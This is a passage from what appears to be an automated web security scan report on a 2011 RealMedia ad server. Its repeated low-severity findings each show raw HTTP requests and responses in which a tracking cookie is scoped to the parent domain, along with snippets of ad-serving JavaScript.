Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:25:15 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1108
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:26:15 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

10.89. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1059242575@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245733549&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:35:33 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 421
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0b45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:24:22 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/769518505/Top1/USNetwork/BCN2011050799_001_JacksonHewitt/JH.728x90-5.24.gif/7263485
...[SNIP]...

10.90. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P4018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1091147736@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308243558856&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:59:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P4018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 430
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0445525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:00:19 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/2032205810/Top1/USNetwork/BCN2011020713_001_AllMenus/ROCK_RETARGETING_728x90.jpg/72
...[SNIP]...

10.91. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1098629905@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308243249533&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:54:09 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P3018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 429
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:42:58 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/290480156/Top1/USNetwork/BCN2011020713_001_AllMenus/ROCK_RETARGETING_728x90.jpg/726
...[SNIP]...

10.92. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1187700357@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246354487&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|O3018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:45:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 969
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:34:43 GMT;path=/;httponly

document.write ('\n');
document.write ('<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/17412-120572-6712-0?mpt=1984547796&mpvc=http://network.realmedia.com
...[SNIP]...

10.93. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1236153237@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246663588&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P2018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:51:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P3018PO|P1018RK|O3018RL|P5018RV|Q1018Rb|O3018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1103
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:39:52 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

10.94. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1319798396@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308242940378&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P1018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:49:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P2018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 428
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:37:49 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/59852185/Top1/USNetwork/BCN2011020713_001_AllMenus/ROCK_RETARGETING_728x90.jpg/7263
...[SNIP]...

10.95. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1359015114@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244493867&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:14:54 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 980
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 09:03:42 GMT;path=/;httponly

document.write ('\n');
document.write ('<script type="text/javascript" src="http://altfarm.mediaplex.com/ad/js/17985-125897-6712-46?mpt=835797786&mpvc=http://network.realmedia.
...[SNIP]...

10.96. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018RL; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1443368947@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QW4uQO1018RL|O2018UF

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:26:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018RL; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 421
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:15:07 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/450705842/Top1/USNetwork/BCN2011050799_001_JacksonHewitt/JH.728x90-5.24.gif/7263485
...[SNIP]...

10.97. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1512823451@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308242320234&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO7018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:38:40 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3104
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 16:39:40 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write (' \n');
document.write ('\n');
document.write ('\n');
document.write ('\n');
document.write ('<script type="text/j
...[SNIP]...

10.98. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO8018HQ|O1018HS|P1018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1515366038@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308245114139&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO8018HQ|O1018HS|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 17:25:14 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO8018HQ|O1018HS|P1018PO|P1018RK|O2018RL|P5018RV|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1107
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e3145525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 17:26:14 GMT;path=/;httponly

document.write ('<script type="text/javascript" language="javascript">\n');
document.write ('var fd_clk = ');
document.write ("'");
document.write ('http://network.realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1551279173@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO1018RL

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:36:39 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO1018RL|O1018UF; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 403
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 07:25:27 GMT;path=/;httponly

document.write ('<A HREF="http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/687566252/Top1/USNetwork/BCN2011050683_001_InEx/2225-728x90-A2.jpg/726348573830336e
...[SNIP]...

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://network.realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/1704218535@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308241699511&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803n7NgADRjb; RMFD=011QXESZO5018HQ|O1018HS|O2018RL|O2018UF|O2018XI

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:28:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011QXESZO6018HQ|O1018HS|O2018RL|O2018UF|O2018XI; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3097
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 08:17:08 GMT;path=/;httponly

document.write ('\n');
document.write ('\n');
